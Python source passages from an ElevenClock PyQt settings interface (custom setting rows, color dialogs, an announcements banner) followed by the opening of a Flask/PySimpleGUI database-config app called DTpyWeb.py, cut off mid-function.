self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft YaHei UI\";")
self.descLabel.setStyleSheet("font-size: 8pt;background: none;font-family: \"Microsoft YaHei UI\";")
else:
self.label.setStyleSheet(f"font-size: 10pt;background: none;font-family: \"Segoe UI Variable Display {semib}\";")
self.descLabel.setStyleSheet(f"font-size: 8pt;background: none;font-family: \"Segoe UI Variable Display {semib}\";")
self.image = QLabel(self)
self.image.setStyleSheet(f"padding: {self.getPx(1)}px;background: none;")
self.setAttribute(Qt.WA_StyledBackground)
self.compressibleWidget = QWidget(self)
self.compressibleWidget.show()
self.compressibleWidget.setAutoFillBackground(True)
self.compressibleWidget.setObjectName("compressibleWidget")
self.compressibleWidget.setStyleSheet("#compressibleWidget{background-color: transparent;}")
self.showHideButton = QPushButton("", self)
self.showHideButton.setIcon(QIcon(getPath(f"expand_{self.iconMode}.png")))
self.showHideButton.setStyleSheet("border: none; background-color:none;")
self.showHideButton.clicked.connect(self.toggleChilds)
l = QVBoxLayout()
l.setSpacing(0)
l.setContentsMargins(0, 0, 0, 0)
self.childsVisible = False
self.compressibleWidget.setLayout(l)
self.setStyleSheet(f"QWidget#subtitleLabel{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;}}")
self.showAnim = QVariantAnimation(self.compressibleWidget)
self.showAnim.setEasingCurve(QEasingCurve.InOutCubic)
self.showAnim.setStartValue(0)
self.showAnim.setEndValue(1000)
self.showAnim.valueChanged.connect(lambda v: self.setChildFixedHeight(v))
self.showAnim.setDuration(300)
self.showAnim.finished.connect(self.invertNotAnimated)
self.hideAnim = QVariantAnimation(self.compressibleWidget)
self.hideAnim.setEndValue(0)
self.hideAnim.setEasingCurve(QEasingCurve.InOutCubic)
self.hideAnim.valueChanged.connect(lambda v: self.setChildFixedHeight(v))
self.hideAnim.setDuration(300)
self.hideAnim.finished.connect(self.invertNotAnimated)
self.scrollAnim = QVariantAnimation(self)
self.scrollAnim.setEasingCurve(QEasingCurve.InOutCubic)
self.scrollAnim.valueChanged.connect(lambda i: self.window().scrollArea.verticalScrollBar().setValue(i))
self.scrollAnim.setDuration(300)
self.NotAnimated = True
self.button = QPushButton("", self)
self.button.setObjectName("subtitleLabelHover")
self.button.clicked.connect(self.toggleChilds)
self.button.setStyleSheet(f"border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;")
self.button.setStyleSheet(f"border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;")
self.setChildFixedHeight(0)
def setChildFixedHeight(self, h: int) -> None:
self.compressibleWidget.setFixedHeight(h)
self.setFixedHeight(h+self.getPx(70))
def invertNotAnimated(self):
self.NotAnimated = not self.NotAnimated
def toggleChilds(self):
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
else:
self.iconMode = "black"
if self.childsVisible:
self.childsVisible = False
self.hideAnim.setStartValue(self.compressibleWidget.sizeHint().height())
self.hideAnim.setEndValue(0)
self.invertNotAnimated()
self.scrollAnim.setStartValue(self.window().scrollArea.verticalScrollBar().value())
self.scrollAnim.setEndValue(self.oldScrollValue)
self.scrollAnim.start()
self.showHideButton.setIcon(QIcon(getPath(f"expand_{self.iconMode}.png")))
self.hideAnim.finished.connect(lambda: self.button.setStyleSheet(f"border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;"))
self.hideAnim.start()
else:
self.showHideButton.setIcon(QIcon(getPath(f"collapse_{self.iconMode}.png")))
self.button.setStyleSheet(f"border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;")
self.invertNotAnimated()
self.childsVisible = True
self.oldScrollValue = self.window().scrollArea.verticalScrollBar().value()
self.scrollAnim.setStartValue(self.oldScrollValue)
self.scrollAnim.setEndValue(self.pos().y()-self.getPx(5))
self.scrollAnim.start()
self.showAnim.setStartValue(0)
self.showAnim.setEndValue(self.compressibleWidget.sizeHint().height())
self.showAnim.start()
def window(self) -> 'SettingsWindow':
return super().window()
def getPx(self, original) -> int:
return round(original*(self.screen().logicalDotsPerInchX()/96))
def setIcon(self, icon: str) -> None:
self.image.setPixmap(QIcon(icon).pixmap(QSize(self.getPx(24), self.getPx(24))))
def resizeEvent(self, event: QResizeEvent) -> None:
if not self.searchMode:
self.image.show()
self.showHideButton.show()
self.button.show()
self.image.show()
self.label.show()
self.descLabel.show()
self.image.setPixmap(QIcon(self.icon).pixmap(QSize(self.getPx(24), self.getPx(24))))
self.button.move(0, 0)
self.button.resize(self.width(), self.getPx(70))
self.showHideButton.setIconSize(QSize(self.getPx(12), self.getPx(12)))
self.showHideButton.setFixedSize(self.getPx(30), self.getPx(30))
self.showHideButton.move(self.width()-self.getPx(55), self.getPx(20))
self.label.move(self.getPx(70), self.getPx(17))
self.label.setFixedHeight(self.getPx(20))
self.descLabel.move(self.getPx(70), self.getPx(37))
self.descLabel.setFixedHeight(self.getPx(20))
self.descLabel.setFixedWidth(self.width()-self.getPx(70)-self.getPx(70))
self.image.move(self.getPx(27), self.getPx(20))
self.image.setFixedHeight(self.getPx(30))
if self.childsVisible and self.NotAnimated:
self.setFixedHeight(self.compressibleWidget.sizeHint().height()+self.getPx(70))
self.compressibleWidget.setFixedHeight(self.compressibleWidget.sizeHint().height())
elif self.NotAnimated:
self.setFixedHeight(self.getPx(70))
self.compressibleWidget.move(0, self.getPx(70))
self.compressibleWidget.setFixedWidth(self.width())
self.image.setFixedHeight(self.getPx(30))
self.label.setFixedWidth(self.width()-self.getPx(140))
self.image.setFixedWidth(self.getPx(30))
else:
self.image.hide()
self.showHideButton.hide()
self.button.hide()
self.image.hide()
self.label.hide()
self.descLabel.hide()
self.setFixedHeight(self.compressibleWidget.sizeHint().height())
self.compressibleWidget.setFixedHeight(self.compressibleWidget.sizeHint().height())
self.compressibleWidget.move(0, 0)
self.compressibleWidget.setFixedWidth(self.width())
return super().resizeEvent(event)
def addWidget(self, widget: QWidget) -> None:
self.compressibleWidget.layout().addWidget(widget)
self.childrenw.append(widget)
def getChildren(self) -> list:
return self.childrenw
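# Settings row with a label on the left and a push button on the right; re-emits the button press as the clicked signal.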
class QSettingsButton(QWidget):
clicked = Signal()
def __init__(self, text="", btntext="", parent=None, h = 30):
super().__init__(parent)
self.fh = h
self.setAttribute(Qt.WA_StyledBackground)
self.button = QPushButton(btntext+" ", self)
self.button.setLayoutDirection(Qt.RightToLeft)
self.setObjectName("stBtn")
self.label = QLabel("\u200e"+text, self)
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.button.setStyleSheet("font-size: 10pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
elif lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
self.button.setStyleSheet("font-size: 10pt;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.button.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
self.button.clicked.connect(self.clicked.emit)
def getPx(self, original) -> int:
return round(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.button.move(self.width()-self.getPx(170), self.getPx(10))
self.label.move(self.getPx(70), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(250))
self.label.setFixedHeight(self.getPx(self.fh))
self.setFixedHeight(self.getPx(50+(self.fh-30)))
self.button.setFixedHeight(self.getPx(self.fh))
self.button.setFixedWidth(self.getPx(150))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
self.button.setIcon(icon)
def text(self) -> str:
return self.label.text() + " " + self.button.text()
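# Settings row with a combo box on the right; textChanged re-emits the current selection, and an optional "Restart ElevenClock" button can be shown.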
class QSettingsComboBox(QWidget):
textChanged = Signal(str)
def __init__(self, text="", btntext="", parent=None):
super().__init__(parent)
class QComboBoxWithFluentMenu(QComboBox):
def __init__(self, parent) -> None:
super().__init__(parent)
v = self.view().window()
ApplyMenuBlur(v.winId().__int__(), v)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QComboBoxWithFluentMenu(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.setItemDelegate(QStyledItemDelegate(self.combobox))
self.setObjectName("stBtn")
self.restartButton = QPushButton("Restart ElevenClock", self)
self.restartButton.hide()
self.restartButton.setObjectName("AccentButton")
self.label = QLabel("\u200e"+text, self)
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
elif lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 11pt;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 11pt;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
def getPx(self, original) -> int:
return round(original*(self.screen().logicalDotsPerInchX()/96))
def setItems(self, items: list, index: int) -> None:
self.combobox.addItems(items)
try:
self.combobox.setCurrentIndex(index)
except Exception as e:
report(e)
self.combobox.setCurrentIndex(0)
self.combobox.currentTextChanged.connect(self.textChanged.emit)
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.label.move(self.getPx(70), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(480))
self.label.setFixedHeight(self.getPx(30))
self.restartButton.move(self.width()-self.getPx(430), self.getPx(10))
self.restartButton.setFixedWidth(self.getPx(150))
self.restartButton.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
pass
#self.button.setIcon(icon)
def showRestartButton(self) -> None:
self.restartButton.show()
def text(self) -> str:
return self.label.text() + " " + self.combobox.currentText()
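# Settings row wrapping a single checkbox; stateChanged re-emits the check state.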
class QSettingsCheckBox(QWidget):
stateChanged = Signal(bool)
def __init__(self, text="", parent=None):
super().__init__(parent)
self.setAttribute(Qt.WA_StyledBackground)
self.setObjectName("stChkBg")
self.checkbox = QCheckBox(text, self)
if lang == lang_zh_TW:
self.checkbox.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
elif lang == lang_zh_CN:
self.checkbox.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
else:
self.checkbox.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.checkbox.setObjectName("stChk")
self.checkbox.stateChanged.connect(self.stateChanged.emit)
def setChecked(self, checked: bool) -> None:
self.checkbox.setChecked(checked)
def isChecked(self) -> bool:
return self.checkbox.isChecked()
def getPx(self, original) -> int:
return round(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedHeight(self.getPx(30))
self.checkbox.setFixedWidth(self.width()-self.getPx(70))
self.setFixedHeight(self.getPx(50))
return super().resizeEvent(event)
def text(self) -> str:
return self.checkbox.text()
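# Checkbox row that shows an extra warning label (rich text, external links allowed) while the box is checked.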
class QSettingsCheckBoxWithWarning(QSettingsCheckBox):
def __init__(self, text = "", infotext = "", parent=None):
super().__init__(text=text, parent=parent)
self.infolabel = QLabel(infotext, self)
self.infolabel.setTextFormat(Qt.RichText)
self.infolabel.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.infolabel.setTextInteractionFlags(Qt.TextBrowserInteraction)
self.infolabel.setOpenExternalLinks(True)
self.infolabel.setObjectName("warningLabel")
self.infolabel.setVisible(self.checkbox.isChecked())
self.checkbox.stateChanged.connect(self.stateChangedFun)
def stateChangedFun(self, checked: bool) -> None:
self.infolabel.setVisible(checked)
self.stateChanged.emit(checked)
def resizeEvent(self, event: QResizeEvent) -> None:
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedHeight(self.getPx(30))
self.checkbox.setFixedWidth(self.width()-self.getPx(70))
self.infolabel.move(self.getPx(150), self.getPx(10))
self.infolabel.setFixedHeight(self.getPx(30))
self.infolabel.setFixedWidth(self.width()-self.getPx(70)-self.getPx(150))
self.setFixedHeight(self.getPx(50))
return super().resizeEvent(event)
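# Checkbox row paired with a size combo box; the combo box is only enabled while the checkbox is checked.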
class QSettingsSizeBoxComboBox(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
class QComboBoxWithFluentMenu(QComboBox):
def __init__(self, parent) -> None:
super().__init__(parent)
v = self.view().window()
ApplyMenuBlur(v.winId().__int__(), v)
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QComboBoxWithFluentMenu(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.currentIndexChanged.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, i: int):
self.valueChanged.emit(self.combobox.itemText(i))
def stateChangedEvent(self, v: bool):
self.combobox.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.combobox.setEnabled(False)
self.combobox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.combobox.setEnabled(True)
self.combobox.setToolTip("")
self.valueChanged.emit(self.combobox.currentText())
self.stateChanged.emit(v)
def loadItems(self):
self.combobox.clear()
self.combobox.addItems([str(item) for item in [5, 6, 7, 7.5, 8, 8.5, 9, 9.5, 10, 10.5, 11, 11.5, 12, 13, 14, 16]])
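# Checkbox row paired with a slider; the slider is only enabled while the checkbox is checked.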
class QSettingsSliderWithCheckBox(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(int)
def __init__(self, text: str, parent=None, min: int = 10, max: int = 100):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.slider = QSlider(self)
self.slider.setRange(min, max)
self.slider.setOrientation(Qt.Horizontal)
self.slider.setObjectName("slider")
self.slider.sliderReleased.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.slider.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.slider.setFixedHeight(self.getPx(30))
self.slider.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self):
self.valueChanged.emit(self.slider.value())
def stateChangedEvent(self, v: bool):
self.slider.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.slider.setEnabled(False)
self.slider.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.slider.setEnabled(True)
self.slider.setToolTip("")
self.valueChanged.emit(self.slider.value())
self.stateChanged.emit(v)
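# Frameless QColorDialog variant with a translucent Mica/acrylic backdrop matching the rest of the settings UI.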
class QCustomColorDialog(QColorDialog):
def __init__(self, parent=None) -> None:
super().__init__(parent=parent)
self.setWindowModality(Qt.WindowModality.WindowModal)
self.setStyleSheet(f"*{{border-radius: {self.getPx(4)}px;}} QColorLuminancePicker {{background-color: transparent; border: {self.getPx(4)}px solid black;margin: none; border: none; padding: none;}} ")
self.setAttribute(Qt.WA_TranslucentBackground)
self.setAutoFillBackground(True)
self.setWindowTitle("")
pixmap = QPixmap(32, 32)
pixmap.fill(Qt.transparent)
self.setWindowIcon(QIcon(pixmap))
self.hwnd = self.winId().__int__()
window_style = win32gui.GetWindowLong(self.hwnd, GWL_STYLE)
win32gui.SetWindowLong(self.hwnd, GWL_STYLE, window_style | WS_POPUP | WS_THICKFRAME | WS_CAPTION | WS_SYSMENU)
if QtWin.isCompositionEnabled():
QtWin.extendFrameIntoClientArea(self, -1, -1, -1, -1)
else:
QtWin.resetExtendedFrame(self)
if ApplyMica(self.hwnd, isWindowDark()) != 0x0:
if isWindowDark():
GlobalBlur(self.winId().__int__(), Dark=True, Acrylic=True, hexColor="#333333ff")
else:
GlobalBlur(self.winId().__int__(), Dark=False, Acrylic=True, hexColor="#ffffffdd")
self.setWindowIcon(self.window().windowIcon())
def getPx(self, i: int):
return round(i*(self.screen().logicalDotsPerInch()/96))
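# Checkbox row with a "Select custom color" button; emits the chosen color as an "r,g,b" string.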
class QSettingsSizeBoxColorDialog(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.colorDialog = QCustomColorDialog(self)
self.colorDialog.setOptions(QColorDialog.DontUseNativeDialog)
self.button = QPushButton(self)
self.button.setObjectName("stCmbbx")
self.button.setText(_("Select custom color"))
self.button.clicked.connect(self.colorDialog.show)
self.colorDialog.colorSelected.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.button.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.button.setFixedHeight(self.getPx(30))
self.button.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, c: QColor):
r = c.red()
g = c.green()
b = c.blue()
color = f"{r},{g},{b}"
self.valueChanged.emit(color)
self.button.setStyleSheet(f"color: rgb({color})")
def stateChangedEvent(self, v: bool):
self.button.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.button.setEnabled(False)
self.button.setStyleSheet("")
self.button.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.button.setEnabled(True)
self.button.setToolTip("")
self.stateChanged.emit(v)
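# Same as QSettingsSizeBoxColorDialog, but the emitted value also carries the alpha channel as a 0-100 percentage ("r,g,b,a").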
class QSettingsBgBoxColorDialog(QSettingsSizeBoxColorDialog):
def valuechangedEvent(self, c: QColor):
r = c.red()
g = c.green()
b = c.blue()
a = c.alpha()
color = f"{r},{g},{b},{a/255*100}"
self.valueChanged.emit(color)
self.button.setStyleSheet(f"background-color: rgba({color})")
class QSettingsFontBoxComboBox(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
class QFontComboBoxWithFluentMenu(QFontComboBox):
def __init__(self, parent) -> None:
super().__init__(parent)
v = self.view().window()
ApplyMenuBlur(v.winId().__int__(), v)
self.combobox = QFontComboBoxWithFluentMenu(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.currentIndexChanged.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, i: int):
self.valueChanged.emit(self.combobox.itemText(i))
self.combobox.lineEdit().setFont(QFont(self.combobox.itemText(i)))
def stateChangedEvent(self, v: bool):
self.combobox.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.combobox.setEnabled(False)
self.combobox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.combobox.setEnabled(True)
self.combobox.setToolTip("")
self.valueChanged.emit(self.combobox.currentText())
self.combobox.lineEdit().setFont(QFont(self.combobox.currentText()))
self.stateChanged.emit(v)
def setItems(self, items: list):
self.combobox.clear()
self.combobox.addItems(items)
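# Scrollable banner that downloads the latest ElevenClock announcement (text plus optional image) and updates the UI through the callInMain signal.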
class QAnnouncements(QLabel):
callInMain = Signal(object)
def __init__(self):
super().__init__()
self.area = QScrollArea()
self.setMaximumWidth(self.getPx(1000))
self.callInMain.connect(lambda f: f())
#self.setObjectName("subtitleLabel")
self.setFixedHeight(self.getPx(110))
self.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.setStyleSheet(f"#subtitleLabel{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;font-size: 12pt;}}*{{padding: 3px;}}")
self.setTtext(_("Fetching latest announcement, please wait..."))
layout = QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
self.setContentsMargins(0, 0, 0, 0)
layout.setSpacing(0)
self.pictureLabel = QLabel()
self.pictureLabel.setContentsMargins(0, 0, 0, 0)
self.pictureLabel.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.textLabel = QLabel()
self.textLabel.setOpenExternalLinks(True)
self.textLabel.setContentsMargins(self.getPx(10), 0, self.getPx(10), 0)
self.textLabel.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)
layout.addStretch()
layout.addWidget(self.textLabel, stretch=0)
layout.addWidget(self.pictureLabel, stretch=0)
layout.addStretch()
self.w = QWidget()
self.w.setObjectName("backgroundWindow")
self.w.setLayout(layout)
self.w.setContentsMargins(0, 0, 0, 0)
self.area.setWidget(self.w)
l = QVBoxLayout()
l.setSpacing(0)
l.setContentsMargins(0, self.getPx(5), 0, self.getPx(5))
l.addWidget(self.area, stretch=1)
self.area.setWidgetResizable(True)
self.area.setContentsMargins(0, 0, 0, 0)
self.area.setObjectName("backgroundWindow")
self.area.setStyleSheet("border: 0px solid black; padding: 0px; margin: 0px;")
self.area.setFrameShape(QFrame.NoFrame)
self.area.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.area.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.pictureLabel.setFixedHeight(self.area.height())
self.textLabel.setFixedHeight(self.area.height())
self.setLayout(l)
def loadAnnouncements(self):
try:
response = urlopen("http://www.somepythonthings.tk/resources/elevenclock.announcement")
print("🔵 Announcement URL:", response.url)
response = response.read().decode("utf8")
self.callInMain.emit(lambda: self.setTtext(""))
announcement_body = response.split("////")[0].strip().replace("http://", "ignore:").replace("https://", "ignoreSecure:").replace("linkId", "http://somepythonthings.tk/redirect/").replace("linkColor", f"rgb({getColors()[2 if isWindowDark() else 4]})")
self.callInMain.emit(lambda: self.textLabel.setText(announcement_body))
self.callInMain.emit(lambda: self.pictureLabel.setText("Loading media..."))
announcement_image_url = response.split("////")[1].strip()
try:
response = urlopen(announcement_image_url)
print("🔵 Image URL:", response.url)
response = response.read()
self.file = open(os.path.join(os.path.expanduser("~"), ".elevenclock", "announcement.png"), "wb")
self.file.write(response)
self.callInMain.emit(lambda: self.pictureLabel.setText(""))
self.file.close()
h = self.area.height()
self.callInMain.emit(lambda: self.pictureLabel.setFixedHeight(h))
self.callInMain.emit(lambda: self.textLabel.setFixedHeight(h))
self.callInMain.emit(lambda: self.pictureLabel.setPixmap(QPixmap(self.file.name).scaledToHeight(h-self.getPx(6), Qt.SmoothTransformation)))
except Exception as ex:
s = _("Couldn't load the announcement image")+"\n\n"+str(ex)
self.callInMain.emit(lambda: self.pictureLabel.setText(s))
print("🟠 Unable to retrieve announcement image")
report(ex)
except Exception as e:
s = _("Couldn't load the announcements. Please try again later")+"\n\n"+str(e)
self.callInMain.emit(lambda: self.setTtext(s))
print("🟠 Unable to retrieve latest announcement")
report(e)
def showEvent(self, a0: QShowEvent) -> None:
return super().showEvent(a0)
def getPx(self, i: int) -> int:
return round(i*(self.screen().logicalDotsPerInch()/96))
def setTtext(self, a0: str) -> None:
return super().setText(a0)
def setText(self, a: str) -> None:
raise Exception("This member should not be used under any circumstances")
if __name__ == "__main__":
import __init__
|
DTpyWeb.py
|
import PySimpleGUI as sg
import os, re, subprocess
from flask import Flask, render_template, flash, redirect, url_for, request, session
from classes.forms import RegistrationForm
from classes.functions import Main
import datetime, textwrap
from configparser import ConfigParser
from multiprocessing import Process
import webbrowser
import threading
configPath = "config.ini"
config = ConfigParser()
config.read(configPath)
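# Validate an IPv4 address in dotted decimal, hexadecimal, octal or plain 32-bit integer notation,
# e.g. validipv4("192.168.1.10") -> True, validipv4("999.1.1.1") -> False.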
def validipv4(ip):
pattern = re.compile(r"""
^
(?:
# Dotted variants:
(?:
# Decimal 1-255 (no leading 0's)
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2} # Hexadecimal 0x0 - 0xFF (possible leading 0's)
|
0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's)
)
(?: # Repeat 0-3 times, separated by a dot
\.
(?:
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2}
|
0+[1-3]?[0-7]{0,2}
)
){0,3}
|
0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff
|
0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777
|
# Decimal notation, 1-4294967295:
429496729[0-5]|42949672[0-8]\d|4294967[01]\d\d|429496[0-6]\d{3}|
42949[0-5]\d{4}|4294[0-8]\d{5}|429[0-3]\d{6}|42[0-8]\d{7}|
4[01]\d{8}|[1-3]\d{0,9}|[4-9]\d{0,8}
)
$
""", re.VERBOSE | re.IGNORECASE)
return pattern.match(ip) is not None
sqlReference = "Windows Drivers Reference\n" \
"{SQL Server} - released with SQL Server 2000\n" \
"{SQL Native Client} - released with SQL Server 2005 (also known as version 9.0)\n" \
"{SQL Server Native Client 10.0} - released with SQL Server 2008\n" \
"{SQL Server Native Client 11.0} - released with SQL Server 2012\n" \
"{ODBC Driver 11 for SQL Server} - supports SQL Server 2005 through 2014\n" \
"{ODBC Driver 13 for SQL Server} - supports SQL Server 2005 through 2016\n" \
"{ODBC Driver 13.1 for SQL Server} - supports SQL Server 2008 through 2016\n" \
"{ODBC Driver 17 for SQL Server} - supports SQL Server 2008 through 2017"
sqlConnect = [
[sg.Text("SQL Driver", size=(10,1)), sg.DropDown(
enable_events=True,
readonly=True,
font=10,
default_value=config.get("sqlConfig", "sql_driver"),
size=(24,1),
tooltip=sqlReference, pad=(0,5),
values=["{SQL Server}",
"{SQL Native Client}",
"{SQL Server Native Client 10.0}",
"{SQL Server Native Client 11.0}",
"{ODBC Driver 11 for SQL Server}",
"{ODBC Driver 13 for SQL Server}",
"{ODBC Driver 13.1 for SQL Server}",
"{ODBC Driver 17 for SQL Server}"])],
[sg.Text("Instance",size=(10,1),pad=(0,5) ), sg.InputText(default_text=(config.get("sqlConfig", "SQL_SERVER"))), ],
[sg.Text("Port", size=(10,1) ,pad=(0,5) ),sg.InputText(default_text=(config.get("sqlConfig", "SQL_PORT")))],
[sg.Text("Username", size=(10,1),pad=(0,5)),sg.InputText( default_text=(config.get("sqlConfig", "SQL_USER")))],
[sg.Text("Password", size=(10,1),pad=(0,5)), sg.InputText(password_char="*",default_text=(config.get("sqlConfig", "SQL_PASS")))],
[sg.Text("Database", size=(10,1),pad=(0,5)), sg.InputText(default_text=(config.get("sqlConfig", "SQL_DBASE")))]]
def isPortFree(host, port):
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((host, port))
except socket.error:
return False
else:
return True
finally:
s.close()
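# Run a command through the shell; with wait=True the decoded stdout is returned (and optionally echoed), otherwise an empty string.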
def ExecuteCommandSubprocess(command, wait=False, quiet=True, *args):
try:
sp = subprocess.Popen([command, *args], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = b""
if wait:
out, err = sp.communicate()
if not quiet:
if out:
print(out.decode("utf-8"))
if err:
print(err.decode("utf-8"))
except Exception as e:
print('Exception encountered running command ', e)
return ''
return out.decode('utf-8')
def listThemes():
themes_list = []
for themes in os.listdir('templates/themes/'):
